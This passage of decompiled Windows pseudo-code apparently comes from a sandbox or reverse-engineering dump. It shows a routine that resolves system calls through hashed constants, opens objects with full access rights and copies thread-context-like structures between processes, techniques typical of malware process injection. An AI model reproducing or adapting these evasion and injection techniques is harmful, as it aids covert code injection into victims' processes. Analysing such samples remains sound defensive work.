				char _v476;
				char _v480;
				char _v484;
				char _v488;
				char _v492;
				char _v496;
				char _v500;
				char _v504;
				char _v508;
				char _v512;
				char _v516;
				char _v520;
				char _v524;
				char _v528;
				char _v532;
				char _v536;
				char _v540;
				char _v544;
				char _v548;
				char _v552;
				char _v556;
				char _v560;
				char _v564;
				char _v568;
				char _v572;
				char _v576;
				char _v580;
				char _v584;
				char _v588;
				void* _v592;
				void* _v596;
				void* _v600;
				void* _v604;
				intOrPtr _v608;
				void* _v612;
				void* _v616;
				void* _v620;
				void* _v624;
				void* _v628;
				void* _v632;
				void* _v636;
				void* _v640;
				void* _v644;
				void* _v648;
				void* _v668;
				void* _v1676;
				void* _v1684;
				void* _v1692;
				void* _v1708;
				intOrPtr _v1800;
				intOrPtr _v1804;
				intOrPtr _v1808;
				intOrPtr _v1812;
				intOrPtr _v1816;
				void* _v1820;
				void* _v1824;
				void* _v1828;
				void* _v1832;
				void* _v1836;
				void* _v1840;
				void* _v1844;
				void* _v1848;
				void* _v1852;
				void* _v1856;
				void* _v1860;
				void* _v1864;
				void* _v1868;
				void* _v1872;
				void* _v1876;
				void* _v1956;
				void* _v1960;
				void* _v2760;
				void* _v2764;
				void* _v2768;
				void* _v2772;
				void* _v2776;
				intOrPtr _v2820;
				signed int _v2860;
				void* _v2864;
				intOrPtr _v2868;
				intOrPtr _v2872;
				intOrPtr _v2876;
				void* _v2880;
				intOrPtr _v2884;
				void* _v2888;
				void* _v2896;
				void* _v2904;
				intOrPtr _v2908;
				void* _v2912;
				intOrPtr _v2916;
				void* _v2920;
				void* _v2928;
				void* _v2936;
				void* _v2940;
				void* _v2944;
				void* _v2948;
				void* _v2952;
				void* _v2956;
				char _v2960;
				void* _v2964;
				void* _v2968;
				void* _v2976;
				void* _v2984;
				signed int _v2988;
				signed int _v2992;
				void* _v3000;
				void* _v3020;
				void* _v3048;
				void* _v3052;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t313;
				signed int _t317;
				void* _t322;
				signed int _t325;
				signed int _t329;
				void* _t345;
				intOrPtr _t368;
				signed int _t370;
				signed int _t379;
				signed int _t383;
				signed int _t387;
				signed int _t562;
				signed int _t571;
				signed int _t585;
				signed int _t586;
				signed int _t595;
				signed int _t599;
				signed int _t620;
				signed int _t621;
				signed int _t782;
				void* _t800;
				signed int _t803;
				void* _t812;
				signed int _t817;
				signed int _t820;
				signed int _t831;
				void* _t833;
				void* _t834;
				void* _t835;
				void* _t838;

				_t827 = _t831;
				_push(_t800);
				_t833 = (_t831 & 0xffffffe0) - 0xad4;
				_t595 = __ecx;
				_t812 = __edx;
				E0042B6B0( &_v44,  *((intOrPtr*)(__ecx + 0x1c)));
				_push(0);
				E00431C80(__ecx,  &_v72, _t800, __edx, _t831, _v48);
				E00420B10( &_v56);
				if(E00431F90(_t595,  &_v80, _t831, 0) != 0) {
					_push(0);
					E00429350( &_v168);
					_push(0);
					E00429350( &_v156);
					_push(0);
					E00429350( &_v144);
					__eflags = _t595;
					_t11 = _t595 + 0xc; // 0xc
					_t612 =  ==  ? _t595 : _t11;
					_t313 = E0042BEA0( ==  ? _t595 : _t11, 0x1d, _t812);
					__eflags = _t313;
					if(_t313 != 0) {
						_push(0x1fffff);
						E0042EA50(_t595);
					}
					__eflags = _t595;
					_t12 = _t595 + 0xc; // 0xc
					_t802 =  ==  ? _t595 : _t12;
					_push(0);
					_push(0);
					_t803 =  *( ==  ? _t595 : _t12);
					E00432060(_t595,  &_v228, _t803, _t812);
					 *(_t833 + 0xa78) = 0;
					asm("pxor xmm0, xmm0");
					_v128 = 1;
					asm("movq [esp+0xa90], xmm0");
					 *((intOrPtr*)(_t833 + 0xa90)) = E00429650(_t812);
					_t317 = E004115C0(0x588ab3ea, 0xa65417fb);
					__eflags = _t317;
					if(_t317 == 0) {
						 *(_t833 + 0x40) = 0;
						E0042BDC0(_t833 + 0xa7c,  *((intOrPtr*)(_t833 + 0xa8c)));
						__eflags =  *(_t833 + 0x40);
						if( *(_t833 + 0x40) == 0) {
							_v124 = 0;
							_v136 = 0;
							_v140 = 0;
							 *((intOrPtr*)(_t833 + 0xa84)) = 0;
							_t782 = E004115C0(0x588ab3ea, 0x9cac62c7);
							__eflags = _t782;
							if(_t782 != 0) {
								 *(_t833 + 0x40) =  *(_t833 + 0xa78);
								 *(_t833 + 0x44) = _t782;
								_t322 = E00429650(_t812);
								_t783 =  *(_t833 + 0x44);
								 *(_t833 + 0x50) = _t803;
								_t803 =  *(_t833 + 0x78);
								_t325 =  *( *(_t833 + 0x44))( *((intOrPtr*)(_t833 + 0x64)), 0xffffffff, _t833 + 0xaa0, 0, _t322,  &_v140,  &_v124, 2, 0, 4);
								__eflags = _t325;
								if(_t325 == 0) {
									goto L11;
								} else {
									__eflags = _v168;
									if(_v168 != 0) {
										goto L53;
									}
									goto L54;
								}
							} else {
								L11:
								 *(_t833 + 0x40) = E00429640(_t812, 0);
								E00410C10(_v164,  *(_t833 + 0x44), E00429650(_t812));
								_t833 = _t833 + 0xc;
								_t329 = E004115C0(0x588ab3ea, 0xa8f2638d);
								__eflags = _t329;
								if(_t329 == 0) {
									 *(_t833 + 0x4bc) = 0;
									_t620 = E004115C0(0x588ab3ea, 0xea812079);
									__eflags = _t620;
									if(_t620 == 0) {
										L17:
										_v140 =  *(_t833 + 0x4bc);
										_t621 = E004115C0(0x588ab3ea, 0xea812079);
										__eflags = _t621;
										if(_t621 == 0) {
											L26:
											_v136 =  *(_t833 + 0x4bc);
											__eflags = _v168;
											if(_v168 != 0) {
												E0042BE30( &_v172, _t812);
											}
											__eflags = E0042ED90(_t595) - 0x20;
											_push(0);
											_t336 =  ==  ? 0x438600 : 0x438c40;
											_push( ==  ? 0x438600 : 0x438c40);
											E00411BA0(E0042ED90(_t595) - 0x20, _t833 + 0xac0);
											E00429B10( &_v240);
											E00420B10( &_v124);
											E00429670( &_v228, E00429A90( &_v244, _t812));
											 *(_t833 + 0x40) = E00429640( &_v248, 0);
											E0040AC20(_t827,  *(_t833 + 0x44), E00429640( &_v236, 0),  *((intOrPtr*)(_t833 + 0xab8)));
											_t834 = _t833 + 8;
											_t345 = E0042ED90(_t595);
											__eflags = _t345 - 0x20;
											if(_t345 == 0x20) {
												E00410B70(_t834 + 0x40, 0, 0x47c);
												_t835 = _t834 + 0xc;
												 *((intOrPtr*)(_t835 + 0x44c)) = E00429650(_t812);
												 *((intOrPtr*)(_t835 + 0x444)) = 0x56473829;
												 *((intOrPtr*)(_t835 + 0x46c)) = E004115C0(0x588ab3ea, 0x9cac62c7);
												 *((intOrPtr*)(_t835 + 0x470)) = E004115C0(0x588ab3ea, 0xa8f2638d);
												 *((intOrPtr*)(_t835 + 0x474)) = E004115C0(0x588ab3ea, 0xd8cc7390);
												 *((intOrPtr*)(_t835 + 0x478)) = E004115C0(0x588ab3ea, 0xd16c9225);
												 *((intOrPtr*)(_t835 + 0x47c)) = E004115C0(0x588ab3ea, 0x649746ec);
												 *((intOrPtr*)(_t835 + 0x480)) = E004115C0(0x588ab3ea, 0xe5ef1afa);
												 *((intOrPtr*)(_t835 + 0x484)) = E004115C0(0x588ab3ea, 0x58d59bc9);
												 *((intOrPtr*)(_t835 + 0x488)) = E004115C0(0x588ab3ea, 0x35b39b2b);
												 *((intOrPtr*)(_t835 + 0x48c)) = E004115C0(0x588ab3ea, 0xe9fbf3a8);
												 *((intOrPtr*)(_t835 + 0x490)) = E004115C0(0x588ab3ea, 0xbcd9ca71);
												 *((intOrPtr*)(_t835 + 0x494)) = E004115C0(0x588ab3ea, 0x4faea65b);
												 *((intOrPtr*)(_t835 + 0x498)) = E004115C0(0x588ab3ea, 0xc0b67de0);
												 *((intOrPtr*)(_t835 + 0x49c)) = E004115C0(0x588ab3ea, 0x996e050f);
												 *((intOrPtr*)(_t835 + 0x4a0)) = E004115C0(0x588ab3ea, 0x81c9e4a7);
												 *((intOrPtr*)(_t835 + 0x4a4)) = E004115C0(0x588ab3ea, 0x97abe05f);
												_v1800 = E004115C0(0x588ab3ea, 0x82d274c4);
												_v1804 = E004115C0(0xa1310f65, 0x77be1f6);
												_v1808 = E004115C0(0xa1310f65, 0xe2d27ff4);
												_v1812 = E004115C0(0xa1310f65, 0x69121530);
												_t368 = E004115C0(0xa1310f65, 0xf1c64384);
												 *((intOrPtr*)(_t835 + 0x464)) = _v308;
												_v1816 = _t368;
												 *((intOrPtr*)(_t835 + 0x468)) =  *((intOrPtr*)(_t835 + 0xa98));
												E00429710( &_v368,  &_v2960, 0x47c);
												_push(_t835 + 0xa60);
												_push(0x4bc);
												_t785 =  &_v392;
												_t370 = E0040E900(_t595,  &_v392);
											} else {
												E00410B70(_t834 + 0x4c0, 0, 0x4f0);
												_t838 = _t834 + 0xc;
												_v608 = E00429650(_t812);
												 *((intOrPtr*)( &_v384 - 0xe8)) = 0x56473829;
												_push(0);
												E00429350( &_v384);
												 *((intOrPtr*)(_t838 + 0x40)) = 0x3b4caff7;
												asm("pxor xmm0, xmm0");
												asm("movq [esp+0x48], xmm0");
												E00429670( &_v388, E00429650( &_v388) + 0x10);
												E00429640( &_v392, E00429650( &_v392) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												 *((intOrPtr*)(_t838 + 0x40)) = 0x9cac62c7;
												asm("movq [esp+0x48], xmm1");
												E00429670( &_v396, E00429650( &_v396) + 0x10);
												E00429640( &_v400, E00429650( &_v400) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												_v2820 = 0xa8f2638d;
												asm("movq [esp+0x48], xmm1");
												E00429670(_t838 + 0x9b4, E00429650(_t838 + 0x9b0) + 0x10);
												E00429640( &_v408, E00429650( &_v408) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												 *((intOrPtr*)(_t838 + 0x40)) = 0xd8cc7390;
												asm("movq [esp+0x48], xmm1");
												E00429670( &_v412, E00429650( &_v412) + 0x10);
												E00429640( &_v416, E00429650( &_v416) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												 *((intOrPtr*)(_t838 + 0x40)) = 0xd16c9225;
												asm("movq [esp+0x48], xmm1");
												E00429670( &_v420, E00429650( &_v420) + 0x10);
												E00429640(_t838 + 0x9b4, E00429650(_t838 + 0x9b0) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												 *((intOrPtr*)(_t838 + 0x40)) = 0x649746ec;
												asm("movq [esp+0x48], xmm1");
												E00429670( &_v428, E00429650( &_v428) + 0x10);
												E00429640( &_v432, E00429650( &_v432) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												 *((intOrPtr*)(_t838 + 0x40)) = 0xe5ef1afa;
												asm("movq [esp+0x48], xmm1");
												E00429670( &_v436, E00429650( &_v436) + 0x10);
												E00429640(_t838 + 0x9b4, E00429650(_t838 + 0x9b0) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												_v2860 = 0x58d59bc9;
												asm("movq [esp+0x48], xmm1");
												E00429670( &_v444, E00429650( &_v444) + 0x10);
												E00429640( &_v448, E00429650( &_v448) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												_v2868 = 0x35b39b2b;
												asm("movq [esp+0x48], xmm1");
												E00429670( &_v452, E00429650( &_v452) + 0x10);
												E00429640( &_v456, E00429650( &_v456) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												_v2876 = 0xe9fbf3a8;
												asm("movq [esp+0x48], xmm1");
												E00429670( &_v460, E00429650( &_v460) + 0x10);
												E00429640( &_v464, E00429650( &_v464) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												_v2884 = 0xbcd9ca71;
												asm("movq [esp+0x48], xmm1");
												E00429670( &_v468, E00429650( &_v468) + 0x10);
												E00429640( &_v472, E00429650( &_v472) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												 *((intOrPtr*)(_t838 + 0x40)) = 0x4faea65b;
												asm("movq [esp+0x48], xmm1");
												E00429670( &_v476, E00429650( &_v476) + 0x10);
												E00429640( &_v480, E00429650( &_v480) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												 *((intOrPtr*)(_t838 + 0x40)) = 0xc0b67de0;
												asm("movq [esp+0x48], xmm1");
												E00429670( &_v484, E00429650( &_v484) + 0x10);
												E00429640( &_v488, E00429650( &_v488) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												_v2908 = 0x996e050f;
												asm("movq [esp+0x48], xmm1");
												E00429670( &_v492, E00429650( &_v492) + 0x10);
												E00429640( &_v496, E00429650( &_v496) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												_v2916 = 0x81c9e4a7;
												asm("movq [esp+0x48], xmm1");
												E00429670( &_v500, E00429650( &_v500) + 0x10);
												E00429640( &_v504, E00429650( &_v504) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												 *((intOrPtr*)(_t838 + 0x40)) = 0x97abe05f;
												asm("movq [esp+0x48], xmm1");
												E00429670( &_v508, E00429650( &_v508) + 0x10);
												E00429640( &_v512, E00429650( &_v512) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												 *((intOrPtr*)(_t838 + 0x40)) = 0x82d274c4;
												asm("movq [esp+0x48], xmm1");
												E00429670( &_v516, E00429650( &_v516) + 0x10);
												__eflags = E00429650( &_v520) + 0xfffffff0;
												E00429640( &_v520, E00429650( &_v520) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("movups [eax], xmm0");
												E00431270(0x588ab3ea,  &_v524);
												E00429640( &_v524, 0x10);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x910], xmm0");
												E00429640( &_v528, 0x20);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x918], xmm0");
												E00429640( &_v532, 0x30);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x920], xmm0");
												E00429640( &_v536, 0x40);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x928], xmm0");
												E00429640( &_v540, 0x50);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x930], xmm0");
												E00429640( &_v544, 0x60);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x938], xmm0");
												E00429640( &_v548, 0x70);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x940], xmm0");
												E00429640( &_v552, 0x80);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x948], xmm0");
												E00429640( &_v556, 0x90);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x950], xmm0");
												E00429640( &_v560, 0xa0);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x958], xmm0");
												E00429640( &_v564, 0xb0);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x960], xmm0");
												E00429640( &_v568, 0xc0);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x968], xmm0");
												E00429640( &_v572, 0xd0);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x970], xmm0");
												E00429640( &_v576, 0xe0);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x978], xmm0");
												E00429640( &_v580, 0xf0);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x980], xmm0");
												E00429640( &_v584, 0x100);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x988], xmm0");
												E00429640( &_v588, 0);
												asm("movq xmm0, [eax+0x8]");
												_t819 =  &_v544;
												asm("movdqu [esp+0x60], xmm0");
												E00410B70( &_v544, 0, 0x30);
												_t835 = _t838 + 0xc;
												asm("movd xmm4, edi");
												asm("cdq");
												asm("pxor xmm0, xmm0");
												asm("movdqu [eax-0x950], xmm0");
												_v2992 = _t803;
												asm("movd xmm1, edx");
												asm("cdq");
												asm("movd xmm3, eax");
												asm("punpckldq xmm4, xmm1");
												asm("movd xmm2, edx");
												asm("punpckldq xmm3, xmm2");
												asm("movdqu [esp+0x70], xmm3");
												asm("movdqu [eax-0x960], xmm4");
												_v2988 = _t595;
												do {
													asm("movdqu xmm0, [esp+0x60]");
													asm("movq [esp], xmm0");
													asm("pxor xmm5, xmm5");
													_v2860 = 6;
													asm("movdqu xmm1, [esp+0x80]");
													asm("movq [esp+0xc], xmm1");
													asm("movdqu xmm2, [esp+0x90]");
													asm("movq [esp+0x14], xmm2");
													asm("movq [esp+0x1c], xmm5");
													asm("movdqu xmm3, [esp+0x70]");
													asm("movq xmm4, [0x4393d8]");
													asm("movq [esp+0x24], xmm3");
													asm("movq [esp+0x2c], xmm4");
													asm("movq [esp+0x34], xmm5");
													_t599 = E004304B0(_t803, _t819);
													_t803 =  *(_t835 + 0x9e0);
													_t819 =  *((intOrPtr*)(_t835 + 0x9e4));
													asm("movq xmm0, [esp+0x9f8]");
													__eflags =  ~( *(_t835 + 0x9e8)) + _t803 |  ~_v328 + _t819;
													asm("movdqu xmm1, [esp+0x90]");
													asm("paddq xmm1, xmm0");
													asm("movdqu [esp+0x90], xmm1");
													if(( ~( *(_t835 + 0x9e8)) + _t803 |  ~_v328 + _t819) != 0) {
														goto L35;
													} else {
														_push(0x400);
														E00429350( &_v356);
														 *(_t835 + 0x5c) = E00429640(_t835 + 0x9d4, 0);
														 *((intOrPtr*)(_t835 + 0x58)) = E00429640(_t835 + 0x9d4, 0);
														E00429650( &_v368);
														asm("movdqu xmm0, [esp+0x60]");
														asm("movd xmm6, ecx");
														asm("movq [esp], xmm0");
														_v2872 = 6;
														asm("pxor xmm7, xmm7");
														asm("movdqu xmm1, [esp+0x80]");
														asm("movq xmm2, [0x4393d0]");
														asm("movq [esp+0xc], xmm1");
														_v2860 = _t803;
														 *((intOrPtr*)(_t835 + 0x18)) = _t819;
														asm("movq [esp+0x1c], xmm2");
														asm("cdq");
														asm("movd xmm4, eax");
														asm("movd xmm3, edx");
														asm("cdq");
														asm("punpckldq xmm4, xmm3");
														asm("movq [esp+0x24], xmm4");
														asm("movd xmm5, edx");
														asm("punpckldq xmm6, xmm5");
														asm("movq [esp+0x2c], xmm6");
														asm("movq [esp+0x34], xmm7");
														_t562 = E004304B0(_t803, _t819);
														__eflags = _t562;
														if(_t562 != 0) {
															L56:
															E00429510(_t835 + 0x9d0);
															_t803 = 0xe5ab9b45;
														} else {
															__eflags =  *( *(_t835 + 0x5c)) & 0x0000ffff;
															if(__eflags == 0) {
																goto L56;
															} else {
																E004183B0(_t835 + 0xa28);
																_t819 = _t835 + 0xa30;
																E00422E60(_t835 + 0xa30, __eflags, _t835 + 0xa30, 0x5c);
																E00421020(_t835 + 0xa30, _t835 + 0xa38);
																_t571 = E0042D620( *((intOrPtr*)(_t835 + 0xa38)), E00426040( *((intOrPtr*)(_t835 + 0xa38)), 0x7fffffff));
																E00420B10(_t835 + 0xa38);
																E00420B10(_t835 + 0xa30);
																E00420B10(_t835 + 0xa28);
																E00429510( &_v372);
																_t803 = _t571 ^ 0x38ba5c7b;
																__eflags = _t803;
															}
														}
														__eflags = _t803 - 0xa1310f65;
														if(__eflags == 0) {
															_t803 =  *(_t835 + 0x50);
															_t595 =  *(_t835 + 0x54);
															_t820 =  *(_t835 + 0x9e0);
															 *((intOrPtr*)(_t835 + 0x58)) =  *((intOrPtr*)(_t835 + 0x9e4));
														} else {
															goto L35;
														}
													}
													L37:
													E0040DE60( &_v372, _t803, __eflags, _t820,  *((intOrPtr*)(_t835 + 0x58)));
													E0042A110( &_v396);
													 *((intOrPtr*)(_t835 + 0x40)) = 0xe2d27ff4;
													asm("pxor xmm0, xmm0");
													asm("movq [esp+0x48], xmm0");
													E00429670( &_v396, E00429650( &_v396) + 0x10);
													E00429640( &_v400, E00429650( &_v400) + 0xfffffff0);
													asm("movups xmm0, [esp+0x40]");
													asm("pxor xmm1, xmm1");
													asm("movups [eax], xmm0");
													_v2820 = 0x69121530;
													asm("movq [esp+0x48], xmm1");
													E00429670(_t835 + 0x9b4, E00429650(_t835 + 0x9b0) + 0x10);
													E00429640( &_v408, E00429650( &_v408) + 0xfffffff0);
													asm("movups xmm0, [esp+0x40]");
													asm("pxor xmm1, xmm1");
													asm("movups [eax], xmm0");
													 *((intOrPtr*)(_t835 + 0x40)) = 0x77be1f6;
													asm("movq [esp+0x48], xmm1");
													E00429670( &_v412, E00429650( &_v412) + 0x10);
													E00429640( &_v416, E00429650( &_v416) + 0xfffffff0);
													asm("movups xmm0, [esp+0x40]");
													asm("pxor xmm1, xmm1");
													asm("movups [eax], xmm0");
													 *((intOrPtr*)(_t835 + 0x40)) = 0xf1c64384;
													asm("movq [esp+0x48], xmm1");
													E00429670( &_v420, E00429650( &_v420) + 0x10);
													__eflags = E00429650(_t835 + 0x9b0) + 0xfffffff0;
													E00429640(_t835 + 0x9b4, E00429650(_t835 + 0x9b0) + 0xfffffff0);
													asm("movups xmm0, [esp+0x40]");
													_push( &_v428);
													_push(_v2820);
													_push(_t820);
													asm("movups [edx], xmm0");
													E0040E780( &_v412, _t820, __eflags);
													E00429640(_t835 + 0x9b4, 0);
													asm("movq xmm0, [eax+0x8]");
													asm("movq [esp+0x998], xmm0");
													E00429640( &_v444, 0x10);
													asm("movq xmm0, [eax+0x8]");
													asm("movq [esp+0x9a0], xmm0");
													E00429640( &_v448, 0x20);
													asm("movq xmm0, [eax+0x8]");
													asm("movq [esp+0x990], xmm0");
													E00429640( &_v452, 0x30);
													asm("movq xmm0, [eax+0x8]");
													asm("movq [ecx-0x18], xmm0");
													E00429510(_t835 + 0x9c0);
													E00429510( &_v456);
													asm("cdq");
													asm("movd xmm1, eax");
													asm("movd xmm0, edx");
													asm("cdq");
													asm("movd xmm3, eax");
													asm("punpckldq xmm1, xmm0");
													asm("movq [esp+0x900], xmm1");
													asm("movd xmm2, edx");
													asm("punpckldq xmm3, xmm2");
													asm("movq [esp+0x908], xmm3");
													E00429710( &_v280, _t835 + 0x4c4, 0x4f0);
													_t785 = _t835 + 0xa58;
													_t370 = E0040ACD0(_t595, _t835 + 0xa58, __eflags, 0x5c8,  &_v288);
													goto L38;
													L35:
													__eflags = _t599;
												} while (_t599 == 0);
												_t820 = 0;
												__eflags = 0;
												_t803 =  *(_t835 + 0x50);
												_t595 =  *(_t835 + 0x54);
												 *((intOrPtr*)(_t835 + 0x58)) = 0;
												goto L37;
											}
											L38:
											_t817 = _t370;
											__eflags = _t817;
											if(_t817 != 0) {
												__eflags = _t595;
												_push(0);
												_t597 =  !=  ? _t595 + 0xc : _t595;
												_push( !=  ? _t595 + 0xc : _t595);
												_t387 = E00431A80(_t785, _t595,  &_v296, 0x2710);
												_t835 = _t835 + 0x10;
												_t595 = 0;
												__eflags = _t387;
												_t817 =  !=  ? 0 : _t817;
											}
											__eflags = _v160;
											if(_v160 == 0) {
												L45:
												__eflags = _v156;
												if(_v156 == 0) {
													L50:
													E00432530(_t595,  &_v296, _t785, _t803, _t817);
													E00429510( &_v216);
													E00429510(_t835 + 0xa50);
													E00429510( &_v248);
													E00431F40( &_v152, _t785, _t817);
													return _t817;
												} else {
													_t785 = E004115C0(0x588ab3ea, 0xea812079);
													__eflags = _t785;
													if(_t785 != 0) {
														_t595 = 0;
														__eflags = 0;
														 *_t785(_t803, _v156, 0xffffffff,  &_v176, 0, 0, 1);
													}
													_t379 = E004115C0(0x588ab3ea, 0x35b39b2b);
													__eflags = _t379;
													if(_t379 == 0) {
														goto L50;
													} else {
														_push(_v176);
														asm("int3");
														return _t379;
													}
												}
											} else {
												_t785 = E004115C0(0x588ab3ea, 0xea812079);
												__eflags = _t785;
												if(_t785 != 0) {
													_t595 = 0;
													__eflags = 0;
													 *_t785(_t803, _v160, 0xffffffff,  &_v176, 0, 0, 1);
												}
												_t383 = E004115C0(0x588ab3ea, 0x35b39b2b);
												__eflags = _t383;
												if(_t383 == 0) {
													goto L45;
												} else {
													_push(_v176);
													asm("int3");
													return _t383;
												}
											}
										} else {
											_t783 = _t833 + 0x4bc;
											 *_t621(0xffffffff, _v276, _t803, _t833 + 0x4bc, 0, 0, 2);
											__eflags = 0;
											if(0 == 0) {
												goto L26;
											} else {
												__eflags = _v196;
												if(_v196 != 0) {
													E0042BE30(_t833 + 0xa78, _t812);
												}
												__eflags = _v168;
												if(_v168 == 0) {
													goto L54;
												} else {
													_t585 = E004115C0(0x588ab3ea, 0xea812079);
													__eflags = _t585;
													if(_t585 == 0) {
														_t586 = E004115C0(0x588ab3ea, 0x35b39b2b);
														__eflags = _t586;
														if(_t586 == 0) {
															goto L54;
														} else {
															_push( *(_t833 + 0x40));
															asm("int3");
															return _t586;
														}
													} else {
														__eflags = 0;
														_push(1);
														_push(0);
														_push(0);
														_push(_t833 + 0x40);
														_push(0xffffffff);
														_push(_v168);
														_push(_t803);
														asm("int3");
														return _t585;
													}
												}
											}
										}
									} else {
										_t783 = _t833 + 0x4bc;
										 *_t620(0xffffffff, _v172, _t803, _t833 + 0x4bc, 0, 0, 2);
										__eflags = 0;
										if(0 == 0) {
											goto L17;
										} else {
											__eflags = _v196;
											if(_v196 != 0) {
												goto L53;
											} else {
											}
											goto L54;
										}
									}
								} else {
									_push(_v160);
									_push(0xffffffff);
									asm("int3");
									return _t329;
								}
							}
						} else {
							__eflags = _v128;
							if(_v128 != 0) {
								L53:
								E0042BE30(_t833 + 0xa78, _t812);
							} else {
							}
							L54:
							E00432530(_t595, _t833 + 0xa10, _t783, _t803, _t812);
							E00429510( &_v224);
							E00429510( &_v240);
							E00429510(_t833 + 0xa40);
							E00431F40( &_v160, _t783, _t812);
							__eflags = 0;
							return 0;
						}
					} else {
						__eflags = 0;
						_push(0);
						_push(0x8000000);
						_push(4);
						_push(_t833 + 0xa90);
						_push(0);
						_push(0xf001f);
						_push(_t833 + 0xaa4);
						asm("int3");
						return _t317;
					}
				} else {
					E00431F40( &_v72, 0x1d, _t812);
					return 1;
				}
			}

0x00401571
0x00401577
0x00401579
0x0040157f
0x00401581
0x00401592
0x00401597
0x004015a7
0x004015b3
0x004015c8
0x004015e8
0x004015f1
0x004015f6
0x004015ff
0x00401604
0x0040160d
0x00401612
0x00401614
0x00401617
0x0040161a
0x0040161f
0x00401621
0x00401625
0x0040162a
0x0040162a
0x0040162f
0x00401631
0x00401634
0x00401639
0x0040163a
0x00401642
0x00401644
0x00401649
0x00401654
0x00401658
0x00401660
0x00401670
0x00401681
0x00401686
0x00401688
0x004016b2
0x004016c8
0x004016cd
0x004016d2
0x004016e9
0x004016f0
0x004016f7
0x004016fe
0x00401714
0x00401716
0x00401718
0x004026f9
0x004026fd
0x00402701
0x00402706
0x0040270c
0x00402737
0x0040273b
0x0040273d
0x0040273f
0x00000000
0x00402745
0x00402745
0x0040274d
0x00000000
0x00000000
0x00000000
0x0040274d
0x0040171e
0x0040171e
0x00401727
0x0040173e
0x00401743
0x00401750
0x00401755
0x00401757
0x00401764
0x0040177e
0x00401780
0x00401782
0x004017b5
0x004017bc
0x004017d2
0x004017d4
0x004017d6
0x0040186a
0x00401871
0x00401878
0x00401880
0x00401889
0x00401889
0x00401895
0x004018a2
0x004018a4
0x004018a7
0x004018b0
0x004018c3
0x004018cf
0x004018e8
0x004018fb
0x00401912
0x00401917
0x0040191c
0x00401921
0x00401924
0x004027e7
0x004027ec
0x004027f6
0x004027fd
0x00402817
0x0040282d
0x00402843
0x00402859
0x0040286f
0x00402885
0x0040289b
0x004028b1
0x004028c7
0x004028dd
0x004028f3
0x00402909
0x0040291f
0x00402935
0x0040294b
0x00402961
0x00402977
0x0040298d
0x004029a3
0x004029b4
0x004029c0
0x004029ce
0x004029d5
0x004029ed
0x004029fb
0x004029fc
0x00402a01
0x00402a08
0x0040192a
0x00401939
0x0040193e
0x00401948
0x00401956
0x00401960
0x00401962
0x00401967
0x00401976
0x0040197a
0x00401990
0x004019ac
0x004019b1
0x004019bd
0x004019c1
0x004019c4
0x004019cc
0x004019e2
0x004019fe
0x00401a03
0x00401a0f
0x00401a13
0x00401a16
0x00401a1e
0x00401a34
0x00401a50
0x00401a55
0x00401a61
0x00401a65
0x00401a68
0x00401a70
0x00401a86
0x00401aa2
0x00401aa7
0x00401ab3
0x00401ab7
0x00401aba
0x00401ac2
0x00401ad8
0x00401af4
0x00401af9
0x00401b05
0x00401b09
0x00401b0c
0x00401b14
0x00401b2a
0x00401b46
0x00401b4b
0x00401b57
0x00401b5b
0x00401b5e
0x00401b66
0x00401b7c
0x00401b98
0x00401b9d
0x00401ba9
0x00401bad
0x00401bb0
0x00401bb8
0x00401bce
0x00401bea
0x00401bef
0x00401bfb
0x00401bff
0x00401c02
0x00401c0a
0x00401c20
0x00401c3c
0x00401c41
0x00401c4d
0x00401c51
0x00401c54
0x00401c5c
0x00401c72
